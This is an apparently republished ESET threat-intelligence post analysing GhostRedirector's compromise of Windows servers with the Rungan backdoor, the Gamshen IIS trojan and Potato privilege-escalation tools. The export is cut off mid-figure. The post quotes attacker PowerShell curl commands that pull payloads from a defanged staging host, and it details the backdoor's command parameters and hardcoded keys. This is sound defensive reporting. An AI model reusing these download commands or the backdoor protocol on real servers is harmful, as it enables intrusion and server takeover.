{"id":257,"date":"2026-03-20T16:53:59","date_gmt":"2026-03-20T16:53:59","guid":{"rendered":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/20\/backdoors-with-a-side-of-potatoes\/"},"modified":"2026-03-20T16:53:59","modified_gmt":"2026-03-20T16:53:59","slug":"backdoors-with-a-side-of-potatoes","status":"publish","type":"post","link":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/20\/backdoors-with-a-side-of-potatoes\/","title":{"rendered":"Backdoors with a side of Potatoes"},"content":{"rendered":"<div>\n<p>ESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at least 65 Windows servers mainly in Brazil, Thailand, and Vietnam. GhostRedirector used two previously undocumented, custom tools: a passive C++ backdoor that we named Rungan, and a malicious Internet Information Services (IIS) module that we named Gamshen.<\/p>\n<p>While Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to provide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a configured target website. Even though Gamshen only modifies the response when the request comes from Googlebot \u2013 i.e., it does not serve malicious content or otherwise affect regular visitors of the websites \u2013 participation in the SEO fraud scheme can hurt the compromised host website reputation by associating it with shady SEO techniques and the boosted websites.<\/p>\n<p>Interestingly, Gamshen is implemented as a native IIS module \u2013 IIS (Internet Information Services) is Microsoft\u2019s Windows web server software, which has a modular architecture supporting two types of extensions: native (C++ DLL) and managed (.NET assembly). There are different types of malware that can abuse this technology; our 2021 white paper Anatomy of native IIS malware provides a deep insight into the types of native IIS threats and their architecture. 
Gamshen falls under the category of a trojan with the main goal of facilitating SEO fraud, similar to IISerpent, which we documented previously.<\/p>\n<p>Besides Rungan and Gamshen, GhostRedirector also uses a series of other custom tools, as well as the publicly known exploits <a href=\"https:\/\/github.com\/zcgonvh\/EfsPotato\/\" target=\"_blank\" rel=\"noopener\">EfsPotato<\/a> and <a href=\"https:\/\/github.com\/BeichenDream\/BadPotato\/\" target=\"_blank\" rel=\"noopener\">BadPotato<\/a>, to create a privileged user on the server that can be used to download and execute other malicious components with higher privileges, or used as a fallback in case the Rungan backdoor or other malicious tools are removed from the compromised server. We believe with medium confidence that a China-aligned threat actor was behind these attacks. In this blogpost we provide insight into the GhostRedirector arsenal used to compromise its victims.<\/p>\n<blockquote>\n<p><strong>Key points of this blogpost:<\/strong><\/p>\n<ul>\n<li>We observed at least 65 Windows servers compromised in June 2025.<\/li>\n<li>Victims are mainly located in Brazil, Thailand, and Vietnam.<\/li>\n<li>Victims are not related to one specific sector but to a variety such as insurance, healthcare, retail, transportation, technology, and education.<\/li>\n<li>GhostRedirector has developed a new C++ backdoor, Rungan, capable of executing commands on the victim\u2019s server.<\/li>\n<li>GhostRedirector has developed a malicious native IIS module, Gamshen, that can perform SEO fraud; we believe its purpose is to artificially promote various gambling websites.<\/li>\n<li>GhostRedirector relies on public exploits such as BadPotato or EfsPotato for privilege escalation on compromised servers.<\/li>\n<li>Based on various factors, we conclude with medium confidence that a previously unknown, China-aligned threat actor was behind these attacks. 
We have named it GhostRedirector.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Attribution<\/h2>\n<p>We haven\u2019t been able to attribute this attack to any known group; thus we coined the new name GhostRedirector, to cluster all activities documented in this blogpost. These activities started in December 2024, but we were able to discover other related samples that lead us to believe that GhostRedirector has been active since at least August 2024.<\/p>\n<p>GhostRedirector has an arsenal that includes the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and a variety of other utilities. We have clustered these tools together by:<\/p>\n<ul>\n<li>their presence on the same compromised server within the same timeframe,<\/li>\n<li>a shared staging server, and<\/li>\n<li>similarities in the PDB paths of various GhostRedirector tools, as explained below.<\/li>\n<\/ul>\n<p>We believe with medium confidence that GhostRedirector is a China-aligned threat actor, based on the following factors:<\/p>\n<ul>\n<li>multiple samples of GhostRedirector tools have hardcoded Chinese strings,<\/li>\n<li>a code-signing certificate issued to a Chinese company was used in the attack, and<\/li>\n<li>one of the passwords for GhostRedirector-created users on the compromised server contains the word <span style=\"font-family: courier new, courier, monospace;\">huang<\/span>, which is Chinese for yellow.<\/li>\n<\/ul>\n<p>GhostRedirector is not the first known case of a China-aligned threat actor engaging in SEO fraud via malicious IIS modules. Last year, Cisco Talos published a blogpost about a China-aligned threat actor called <a href=\"https:\/\/blog.talosintelligence.com\/dragon-rank-seo-poisoning\/\" target=\"_blank\" rel=\"noopener\">DragonRank<\/a> that conducts SEO fraud. There is some overlap in the victim geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in both attacks. 
However, it is likely that these were opportunistic attacks, exploiting as many vulnerable servers as possible, rather than targeting a specific set of entities. Besides these similarities, we don\u2019t have any reason to believe that DragonRank and GhostRedirector are linked, so we track these activities separately.<\/p>\n<h2>Victimology<\/h2>\n<p>Figure 1\u00a0shows a heatmap of the affected countries, combining data from two sources:<\/p>\n<ul>\n<li>ESET telemetry, where we detected these attacks between December 2024 and April 2025, and<\/li>\n<li>our internet-wide scan from June 2025 that we ran to get a better understanding of the scale of the attack, and that allowed us to identify additional victims.<\/li>\n<\/ul>\n<p>We notified all the victims that we identified through our internet scan about the compromise.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. Countries where victims were detected\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-1-countries-where-victims-were-detected.png\" alt=\"Figure 1 - Countries where victims were detected\" width=\"\" height=\"\"\/><figcaption><em>Figure 1. Countries where victims were detected<\/em><\/figcaption><\/figure>\n<p>With all the collected information, we found that at least 65 Windows servers were compromised worldwide. Most of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Note that most of the compromised servers located in the USA appear to have been rented to companies that are based in countries from the previous list. 
We believe that GhostRedirector was more interested in targeting victims in South America and South Asia.<\/p>\n<p>Also, we observed a small number of cases in:<\/p>\n<ul>\n<li>Canada,<\/li>\n<li>Finland,<\/li>\n<li>India,<\/li>\n<li>the Netherlands,<\/li>\n<li>the Philippines, and<\/li>\n<li>Singapore.<\/li>\n<\/ul>\n<p>GhostRedirector doesn\u2019t seem to be interested in a particular vertical or sector; we have seen victims in sectors such as education, healthcare, insurance, transportation, technology, and retail.<\/p>\n<h2>Initial access<\/h2>\n<p>Based on ESET telemetry, we believe that GhostRedirector gains initial access to its victims by exploiting a vulnerability, probably an SQL injection. Then it uses PowerShell to download various malicious tools \u2013 all from the same staging server, <span style=\"font-family: courier new, courier, monospace;\">868id[.]com<\/span>. In some cases, we have seen the attackers leveraging a different <a href=\"https:\/\/en.wiktionary.org\/wiki\/LOLBin\" target=\"_blank\" rel=\"noopener\">LOLBin<\/a>, CertUtil, for the same purpose.<\/p>\n<p>This conjecture is supported by our observation that most unauthorized PowerShell executions originated from the binary <span style=\"font-family: courier new, courier, monospace;\">sqlserver.exe<\/span>, which holds a stored procedure <span style=\"font-family: courier new, courier, monospace;\">xp_cmdshell<\/span> that can be used to execute commands on a machine.<\/p>\n<p>The following are examples of commands that we detected being executed on the compromised servers:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \" powershell curl\u00a0 https:\/\/xzs.868id[.]com\/EfsNetAutoUser_br.exe -OutFile C:\\ProgramData\\EfsNetAutoUser_br.exe\"<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \" powershell curl\u00a0 http:\/\/xz.868id[.]com\/EfsPotato_sign.exe -OutFile C:\\ProgramData\\EfsPotato_sign.exe\"<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">cmd.exe \/d \/s \/c \"powershell curl\u00a0 https:\/\/xzs.868id[.]com\/link.exe\u00a0 -OutFile C:\\ProgramData\\link.exe\"<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">powershell\u00a0 curl\u00a0 https:\/\/xzs.868id[.]com\/iis\/br\/ManagedEngine64_v2.dll -OutFile\u00a0 C:\\ProgramData\\Microsoft\\DRM\\log\\ManagedEngine64.dll<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">powershell\u00a0 curl https:\/\/xzs.868id[.]com\/iis\/IISAgentDLL.dll -OutFile\u00a0 C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll<\/span><\/li>\n<\/ul>\n<p>We also found that GhostRedirector installed <a href=\"https:\/\/gotohttp.com\/\">GoToHTTP<\/a> on the compromised web server, after downloading it from the same staging server. GoToHTTP is a benign tool that allows establishing a remote connection that can be accessed from a browser.<\/p>\n<p>GhostRedirector used the directory <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\<\/span> to install its malware; for the C++ backdoor and the IIS trojan in particular, it uses the directory <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\DRM\\log<\/span>.<\/p>\n<h2>Attack overview<\/h2>\n<p>An overview of the attack is shown in Figure 2. Attackers compromise a Windows server, then download and execute various malicious tools: a privilege escalation tool, malware that drops multiple webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. 
The purpose of the privilege escalation tools is to create a privileged user in the Administrators group, so GhostRedirector can then leverage this account to execute privileged operations, or as a fallback in case the group loses access to the compromised server.<\/p>\n<p>\u00a0<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Attack overview\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/ghostredirector-figure-2.png\" alt=\"ghostredirector-figure 2\" width=\"\" height=\"\"\/><figcaption><em>Figure 2. Attack overview<\/em><\/figcaption><\/figure>\n<h2>Pernicious Potatoes performing privilege escalation<\/h2>\n<p>As part of its arsenal, GhostRedirector created several tools that leverage the local privilege escalation (<a href=\"https:\/\/attack.mitre.org\/tactics\/TA0004\/\" target=\"_blank\" rel=\"noopener\">LPE<\/a>) tactic, likely based on public EfsPotato and BadPotato exploits. Almost all of the analyzed samples were obfuscated with <a href=\"https:\/\/www.eziriz.com\/dotnet_reactor.htm\" target=\"_blank\" rel=\"noopener\">.NET Reactor<\/a>, with multiple layers of obfuscation. 
Some of the samples were validly signed with a code-signing certificate issued by TrustAsia RSA Code Signing CA G3, to <span style=\"font-family: courier new, courier, monospace;\">\u6df1\u5733\u5e02\u8fea\u5143\u7d20\u79d1\u6280\u6709\u9650\u516c\u53f8<\/span> (Shenzhen Diyuan Technology Co., Ltd.), and with a thumbprint of <span style=\"font-family: courier new, courier, monospace;\">BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C<\/span>.<\/p>\n<p>The main goal of these samples was to create or modify a user account on the compromised server and add it to the Administrators group.<\/p>\n<p>During our analysis, we extracted from the analyzed samples the following usernames that were used in the creation of these malicious administrator users.<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">MysqlServiceEx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">MysqlServiceEx2<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Admin<\/span><\/li>\n<\/ul>\n<p>Figure 3 shows the decompiled code used by these samples to create a user after successful LPE exploitation. The password has been redacted for security purposes.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. Portion of decompiled code that creates a new user on a victim server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-3-portion-of-decompiled-code-that-creates-a-new-user-on-a-victim-server.png\" alt=\"Figure 3 - Portion of decompiled code that creates a new user on a victim server\" width=\"\" height=\"\"\/><figcaption><em>Figure 3. Portion of decompiled code that creates a new user on a victim server<\/em><\/figcaption><\/figure>\n<p>As seen in Figure 3, these privilege escalation tools use a custom C# class named <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span>. 
This class is implemented in a DLL named <span style=\"font-family: courier new, courier, monospace;\">Common.Global.DLL<\/span> (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756562ED73375082192F5A8<\/span>), which we named Comdai and that was embedded in the analyzed samples. We believe that Comdai was created by the same developers as the rest of the GhostRedirector arsenal, based on the shared pattern in their respective PDB paths \u2013 see the repeated <span style=\"font-family: courier new, courier, monospace;\">x5<\/span> substring as shown in Table 1, which is shared between Rungan, Gamshen, and the privilege escalation tools.<\/p>\n<p style=\"text-align: center;\"><em>Table 1. PDB strings collected from GhostRedirector tools<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>Sample SHA1<\/strong><\/td>\n<td width=\"161\"><strong>Sample type<\/strong><\/td>\n<td width=\"303\"><strong>PDBs<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756<wbr\/>562ED73375082192F5A8<\/span><\/td>\n<td width=\"161\">Comdai library<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\netTools\\oMain\\Common.Global<wbr\/>\\obj\\Release\\Common.Global.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC62<wbr\/>15DDAC8E56EACBB29B69<\/span><\/td>\n<td width=\"161\">Rungan, C++ backdoor<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main<wbr\/>\\x64\\Release\\IISAgentDLL.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">871A4DF66A8BAC3E640B<wbr\/>2D1C0AFC075BB3761954<\/span><\/td>\n<td width=\"161\">Gamshen, IIS 
trojan<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main<wbr\/>\\Release\\ManagedEngine64.pdb<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371818BDC20669DF3CA4<wbr\/>4BE758200872D583A3B8<\/span><\/td>\n<td width=\"161\">Tool to create a new user<\/td>\n<td width=\"303\"><span style=\"font-family: courier new, courier, monospace;\">E:\\x5\\netTools\\WinSystem\\obj<wbr\/>\\Release\\uedit32_sign.pdb<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 2 provides an overview of the important classes implemented in Comdai that are used by GhostRedirector\u2019s various privilege escalation tools, along with the description of the class behavior. Note the <span style=\"font-family: courier new, courier, monospace;\">ExeHelper<\/span> class, which provides a function to execute a file named <span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span> \u2013 GhostRedirector used the same filename to deploy the GoToHTTP tool.<\/p>\n<p>Also note the backdoor-like capabilities, including network communication, file execution, directory listing, and manipulating services and Windows registry keys. While we haven\u2019t observed these methods being used by any known GhostRedirector components, this shows that Comdai is a versatile tool that can support various stages of the attack.<\/p>\n<p style=\"text-align: center;\"><em>Table 2. 
Classes implemented in Comdai<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"132\"><strong>C# class<\/strong><\/td>\n<td width=\"510\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">AES<\/span><\/td>\n<td width=\"510\">Encrypts\/Decrypts AES in ECB mode.<br \/>Key: <span style=\"font-family: courier new, courier, monospace;\">030201090405060708091011121315<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span><\/td>\n<td width=\"510\">Lists users on a compromised server.<br \/>Creates a user with specified credentials and adds it into a group name also specified by an argument; by default it uses the Administrators group.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ExeHelper<\/span><\/td>\n<td width=\"510\">Used to execute a binary named <span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span>. 
This name was used by the attackers for the GoToHTTP binary.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">HttpHelper<\/span><\/td>\n<td width=\"510\">Provides several methods that perform GET and POST requests, for an unknown purpose, to a hardcoded URL \u2013 <span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.cs01[.]shop<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">MsgData<\/span><\/td>\n<td width=\"510\">Contains only attributes, used by the class <span style=\"font-family: courier new, courier, monospace;\">NodejsTX<\/span> to deserialize a JSON object.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">MyDll<\/span><\/td>\n<td width=\"510\">Invokes methods from an unknown DLL named <span style=\"font-family: courier new, courier, monospace;\">MyDLL.dll<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NodejsTX<\/span><\/td>\n<td width=\"510\">Provides a method to communicate with another malicious component via pipes; the pipe is named <span style=\"font-family: courier new, courier, monospace;\">salamander_pipe<\/span>, and it can receive parameters to create a specified user who is then added to the Administrators group. 
This user creation is achieved by invoking a method from the <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span> class.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">RegeditHelper<\/span><\/td>\n<td width=\"510\">Contains a method for reading the value of a specified Windows registry key.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ScanfDirectory<\/span><\/td>\n<td width=\"510\">Contains methods for listing the contents of a specified directory.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ServiceHelper<\/span><\/td>\n<td width=\"510\">Contains methods to restart a specified service.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">SystemHelper<\/span><\/td>\n<td width=\"510\">Contains methods to execute a binary or execute commands via the <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.diagnostics.processstartinfo?view=net-8.0\" target=\"_blank\" rel=\"noopener\">ProcessStartInfo<\/a> class. 
The binary or commands are provided to <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.diagnostics.processstartinfo?view=net-8.0\" target=\"_blank\" rel=\"noopener\">ProcessStartInfo<\/a> as arguments.<\/td>\n<\/tr>\n<tr>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">UserStruct<\/span><\/td>\n<td width=\"510\">Contains only attributes: username \u2013 string<br \/>Groups \u2013 list&lt;string&gt;<br \/>Attributes are used by class <span style=\"font-family: courier new, courier, monospace;\">CUserHelper<\/span> for listing users.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Some exceptions to the rule<\/h3>\n<p>We discovered a sample (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">21E877AB2430B72E3DB12881D878F78E0989BB7F<\/span>) using the same certificate, uploaded to VirusTotal in August 2024, which we believe is related to GhostRedirector\u2019s arsenal, although we didn\u2019t see it used during this campaign. This assumption is based on the behavior of the sample, which tries to open a text file and send its contents to a hardcoded URL. 
For this, the sample contains an embedded Comdai DLL and it invokes the Comdai C# class <span style=\"font-family: courier new, courier, monospace;\">HttpHelper<\/span>, which has a hardcoded URL that is <span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.cs01[.]shop<\/span> \u2013 the same domain mentioned in Table 2.<\/p>\n<p>We also discovered some privilege escalation tools that differ a little from the behavior mentioned previously.<\/p>\n<p>For example, in one case (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">5A01981D3F31AF47614E51E6C216BED70D921D60<\/span>), instead of creating a new user, it changes the password of the existing user <span style=\"font-family: courier new, courier, monospace;\">Guest<\/span> to one hardcoded in the malware and then, using the <a href=\"https:\/\/blog.netwrix.com\/2023\/05\/20\/rid-hijacking\/\" target=\"_blank\" rel=\"noopener\">RID hijacking<\/a> technique, it attempts to add this user to the Administrators group.<\/p>\n<p>In another case (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">9DD282184DDFA796204C1D90A46CAA117F46C8E1<\/span>), the tool not only creates a new administrator user but also installs multiple webshells on a specific path on the victim\u2019s servers, provided manually by GhostRedirector as an argument to the tool.<\/p>\n<p>These webshells are embedded in the resources of the sample in cleartext, and the names are hardcoded; the names we saw used are:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">C1.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Cmd.aspx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Error.aspx<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">K32.asxp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">K64.aspx<\/span><\/li>\n<li><span style=\"font-family: 
courier new, courier, monospace;\">LandGrey.asp<\/span><\/li>\n<\/ul>\n<h2><a name=\"_Toc205852299\"\/>Zunput, a website information collector plus webshell dropper<\/h2>\n<p>Another interesting tool used by GhostRedirector had the filename <span style=\"font-family: courier new, courier, monospace;\">SitePuts.exe<\/span>. This sample (SHA\u20111: <span style=\"font-family: courier new, courier, monospace;\">EE22BA5453ED577F8664CA390EB311D067E47786<\/span>), which we named Zunput, is also developed with the .NET Framework and signed with the certificate mentioned above; it reads the IIS configuration system looking for configured websites and obtains the following information about them:<\/p>\n<ul>\n<li>physical path on the server,<\/li>\n<li>name, and<\/li>\n<li>for each site, the following attributes:\n<p style=\"margin-top: 1em;\"><span style=\"color: #00a0a0; font-size: 1em; vertical-align: middle;\">\u25cb<\/span> protocol<\/p>\n<p><span style=\"color: #00a0a0; vertical-align: middle;\">\u25cb<\/span> IP address, and<\/p>\n<p><span style=\"color: #00a0a0; font-size: 1em; vertical-align: middle;\">\u25cb <\/span>hostname<\/p>\n<\/li>\n<\/ul>\n<p>Once the information is collected, Zunput checks for the existence of the physical path on the server, and also verifies that the directory contains at least one file with the <span style=\"font-family: courier new, courier, monospace;\">.php<\/span>, .<span style=\"font-family: courier new, courier, monospace;\">aspx<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">.asp<\/span> extension. This way, Zunput only targets active websites capable of executing dynamic content \u2013 only in those directories does it then drop the embedded webshells. 
Webshells are embedded in the resources of the sample and for the dates of each webshell (creation, modified, accessed), the malware uses the date of an existing file from the directory.<\/p>\n<p>Webshells are written in ASP, PHP, and JavaScript, and the names used are selected randomly from the following list:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">Xml<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Ajax<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Sync<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadapi<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadhelp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Code<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Jsload<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadcss<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Loadjs<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Pop3<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Imap<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Api<\/span><\/li>\n<\/ul>\n<p>Extensions used for the webshells:<\/p>\n<p>Information collected during Zunput execution is saved in a file named <span style=\"font-family: courier new, courier, monospace;\">log.txt<\/span> (see an example in Figure 4) in the directory from which it was executed. This information isn\u2019t exfiltrated automatically by Zunput, but it can be obtained by the attackers through several methods; one can be via the deployed webshell mentioned before.<\/p>\n<figure class=\"image\"><img decoding=\"async\" style=\"width: 70%; margin: 0 auto; display: block;\" title=\"Figure 4. 
Example of saved content of log.txt where \u5206\u5272\u7ebf machine translates to Dividing line\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-4-example-of-saved-content-of-log-txt.png\" alt=\"Figure 4 - Example of saved content of log txt\" width=\"\" height=\"\"\/><figcaption><em>Figure 4. Example of saved content of <\/em><span style=\"font-family: courier new, courier, monospace;\">log.txt<\/span><em> where <\/em><span style=\"font-family: courier new, courier, monospace;\">\u5206\u5272\u7ebf<\/span><em> machine translates to Dividing line<\/em><\/figcaption><\/figure>\n<h2>The final payloads<\/h2>\n<h3>Rungan, a passive C++ backdoor<\/h3>\n<p>Rungan (SHA-1: <span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span>) is a passive C\/C++ backdoor that we have seen installed in <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll<\/span>.<\/p>\n<p>This backdoor uses AES in CBC mode for string decryption. 
<span style=\"font-family: courier new, courier, monospace;\">030201090405060708090A0B0C0D0E0F<\/span>\u00a0is used for the IV and key, and based on the malware\u2019s PDB path <span style=\"font-family: courier new, courier, monospace;\">F:\\x5\\AvoidRandomKill-main\\x64\\Release\\IISAgentDLL.pdb<\/span>, we believe that GhostRedirector reuses the AES implementation from the <a href=\"https:\/\/github.com\/minhangxiaohui\/AvoidRandomKill\/blob\/main\/AvoidRandomKill\/AES.cpp\" target=\"_blank\" rel=\"noopener\">AvoidRandomKill repository<\/a>.<\/p>\n<p>The main functionality of this backdoor is to register a plaintext hardcoded URL <span style=\"font-family: courier new, courier, monospace;\">http:\/\/+:80\/v1.0\/8888\/sys.html<\/span> into the compromised server, bypassing IIS by abusing the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/http\/http-api-start-page\" target=\"_blank\" rel=\"noopener\">HTTP Server API<\/a>. Then the backdoor waits for a request that matches that URL, then parses and executes the received commands on the compromised server.<\/p>\n<p>Additional URLs can be set in an optional configuration file named <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\vbskui.dll<\/span>. Rungan will listen to all incoming requests matching the configured patterns, and the configuration can be updated via a backdoor command. To activate the backdoor, any incoming HTTP request must contain a specific combination of parameters and values, which are hardcoded in Rungan.<\/p>\n<p>Once this check is met, Rungan uses the parameter <span style=\"font-family: courier new, courier, monospace;\">action<\/span> to determine the backdoor command, and uses the data in the HTTP request body as the command parameters. No encryption or encoding is used in the C&amp;C protocol. 
The most notable capabilities are creating a new user or executing commands on the victim\u2019s server; a full list of backdoor commands is shown in Table 3.<\/p>\n<p style=\"text-align: center;\"><em>Table 3.Rungan backdoors commands<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"104\"><strong>Parameter<\/strong><\/td>\n<td width=\"189\"><strong>Body<\/strong><\/td>\n<td width=\"198\"><strong>Description<\/strong><\/td>\n<td width=\"151\"><strong>Response<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">mkuser<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">user=<username>&amp;pwd=<password>&amp;groupname=<groupname\/><\/password><\/username><\/span><\/td>\n<td width=\"198\">Creates the specified user on the compromised server using the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/lmaccess\/nf-lmaccess-netuseradd\">NetUserAdd<\/a> Windows API.<\/td>\n<td width=\"151\">Status code of the operation.<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">listfolder<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">path=<a_path\/><\/span><\/td>\n<td width=\"198\">This looks unfinished: it collects information from selected path but doesn\u2019t exfiltrate it.<\/td>\n<td width=\"151\">N\/A<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">addurl<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">url=<url_1>|<url_2\/><\/url_1><\/span><\/td>\n<td width=\"198\">Registers URLs the backdoor will listen on. Can be more than one separated with <span style=\"font-family: courier new, courier, monospace;\">|<\/span>. 
The URL is also added to the configuration file.<\/td>\n<td width=\"151\">If a URL fails to register, the response will be <span style=\"font-family: courier new, courier, monospace;\">Failed: &lt;url&gt;<\/span>, otherwise <span style=\"font-family: courier new, courier, monospace;\">All Ok<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"104\"><span style=\"font-family: courier new, courier, monospace;\">cmd<\/span><\/td>\n<td width=\"189\"><span style=\"font-family: courier new, courier, monospace;\">cmdpath=&lt;cmd_path&gt;&amp;mingl=&lt;command_to_execute&gt;<\/span><\/td>\n<td width=\"198\">Executes a command on the victim\u2019s server using pipes and the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/processthreadsapi\/nf-processthreadsapi-createprocessa\" target=\"_blank\" rel=\"noopener\">CreateProcessA<\/a> API.<\/td>\n<td width=\"151\">Command output.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Figure 5 and Figure 6 show examples of requests made to the malware during dynamic analysis with the tool <a href=\"https:\/\/www.postman.com\/\" target=\"_blank\" rel=\"noopener\">Postman<\/a> in a simulated environment.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Executing commands on a testing server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-5-executing-commands-on-a-testing-server.png\" alt=\"Figure 